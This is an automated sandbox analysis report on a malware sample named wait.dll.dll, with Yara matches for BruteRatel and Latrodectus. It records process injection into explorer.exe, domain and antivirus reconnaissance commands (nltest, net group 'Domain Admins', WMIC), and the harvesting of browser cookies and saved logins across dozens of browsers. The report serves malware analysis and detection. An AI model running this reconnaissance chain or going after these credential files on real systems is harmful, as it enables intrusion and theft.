Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 4084	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 4084	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 4084	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 4084	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 412	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 412	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 412	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 412	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 412	Jump to behavior

Sets debug register (to hijack the execution of another thread)

Source: C:\Windows\System32\rundll32.exe

Thread register set: 412 1

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\rundll32.exe	Memory written: C:\Windows\explorer.exe base: 3030000	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Memory written: C:\Windows\explorer.exe base: 8380000	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Memory written: C:\Windows\explorer.exe base: 8850000	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",#1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami /groups

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00007FF8A8CF9AC0 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,

3_2_00007FF8A8CF9AC0

Source: explorer.exe, 00000008.00000000.2323476795.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3103191493.0000000009BB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 00000008.00000002.4537142552.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2320547106.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000008.00000000.2321695887.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4537142552.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2320547106.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000008.00000002.4537142552.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2320547106.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000008.00000002.4537142552.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2320547106.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000008.00000000.2320112731.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4535485561.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PProgman

Queries device information via Setup API

Source: C:\Windows\System32\rundll32.exe

3_2_00007FF8A8CFDCBC

Source: C:\Windows\explorer.exe

Code function: 8_2_0E4D4F14 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

8_2_0E4D4F14

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_000001CEAFC94D00 GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,

3_2_000001CEAFC94D00

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00007FF8A8DE4A20 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

3_2_00007FF8A8DE4A20

Source: C:\Windows\explorer.exe

Code function: 8_2_0303891C RtlGetVersion,GetVersionExW,

8_2_0303891C

Source: C:\Windows\System32\nltest.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: WMIC.exe, 00000021.00000002.3489207530.00000156669D1000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3487312815.00000156669C5000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3488726294.00000156669CC000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3487382704.00000156669CB000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3488748596.00000156669D0000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3487514545.0000015666FA1000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000002.3489251608.0000015666C2B000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3488702292.00000156669D5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pathToSignedReportingExe=%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: WMIC.exe, 00000021.00000002.3489251608.0000015666C2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: gnedReportingExe=%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: WMIC.exe, 00000021.00000002.3488807709.0000003146307000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: ndows Defender\MsMpeng.exe
Source: WMIC.exe, 00000021.00000002.3489251608.0000015666C2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: indows Defender\MsMpeng.exe
Source: WMIC.exe, 00000021.00000003.3488148854.0000015666F80000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000002.3489121828.00000156669B6000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3487428020.00000156669B5000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000002.3489100566.00000156669AA000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3487207652.00000156669A7000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3487312815.00000156669A8000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3488168710.0000015666F81000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected BruteRatel

Source: Yara match	File source: 00000003.00000003.2319042957.000001CEB022C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4537635408.000001CEB01FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4537513322.00000233A000C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4538291850.0000027619ADC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.2421944396.0000027619B0B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.2421877879.0000027619B0B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2516556491.00000233A003B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2513239547.00000233A003B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2319103261.000001CEB022C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6564, type: MEMORYSTR

Yara detected Latrodectus

Source: Yara match	File source: 00000008.00000002.4549377026.000000000977A000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 1028, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Contains functionality to steal Internet Explorer form passwords

Source: C:\Windows\explorer.exe

Code function: Software\Microsoft\Internet Explorer\IntelliForms\Storage2

8_2_0E458848

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Suhba\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Elements Browser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Superbird\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Torch\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Elements Browser\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\7Star\7Star\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Xpom\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Nichrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Amigo\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Superbird\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\QIP Surf\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\uCozMedia\Uran\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Sputnik\Sputnik\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Bromium\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Nichrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\RockMelt\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Yandex\YandexBrowser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Kometa\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Go!\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Kometa\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Xpom\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Torch\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\7Star\7Star\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\QIP Surf\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\uCozMedia\Uran\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Amigo\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Rafotech\Mustang\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Sputnik\Sputnik\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Safer Technologies\Secure Browser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Network\Cookies	Jump to behavior

Remote Access Functionality

Yara detected BruteRatel

Source: Yara match	File source: 00000003.00000003.2319042957.000001CEB022C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4537635408.000001CEB01FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4537513322.00000233A000C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4538291850.0000027619ADC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.2421944396.0000027619B0B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.2421877879.0000027619B0B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2516556491.00000233A003B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2513239547.00000233A003B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2319103261.000001CEB022C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6564, type: MEMORYSTR

Yara detected Latrodectus

Source: Yara match	File source: 00000008.00000002.4549377026.000000000977A000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 1028, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Windows Analysis Report
wait.dll.dll

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1566852
Product:	CloudBasic
Start time:	18:42:03
Start date:	02.12.2024
Sample:	wait.dll.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	50bd4ff60c931861e46c801a60f9e916
SHA1:	13b14fb516fa726cc5fa9af17a2f93ff49449830
SHA256:	f2170f7dc2f97434ef4514ed4272dc8792177038a085f248ba33f9259720afda
Filetype:	Win64 Dynamic Link Library (generic) (102004/3) 86.43%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Temp\Ajhu3.tmp	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\Users\user\AppData\Local\Temp\Alakow3.tmp	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1	9E68EA772705B5EC0C83C2A97BB26324	243128040256A9112CEAC269D56AD6B21061FF80	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
C:\Users\user\AppData\Local\Temp\Iyufla1.tmp	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1	28222628A3465C5F0D4B28F70F97F482	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
C:\Users\user\AppData\Local\Temp\boiz3.tmp	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3	369B6DD66F1CAD49D0952C40FEB9AD41	D05B2DE29433FB113EC4C558FF33087ED7481DD4	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
C:\Users\user\AppData\Local\Temp\boiz3.tmp-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\Users\user\AppData\Local\Temp\ruikcu.tmp	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4	9D46F142BBCF25D0D495FF1F3A7609D3	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
C:\Users\user\AppData\Local\Temp\uxax32.tmp	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7	CFFF4E2B77FC5A18AB6323AF9BF95339	3AA2C2115A8EB4516049600E8832E9BFFE0C2412	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE

Windows Analysis Report wait.dll.dll

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
wait.dll.dll

Malware Threat Intel
Provided by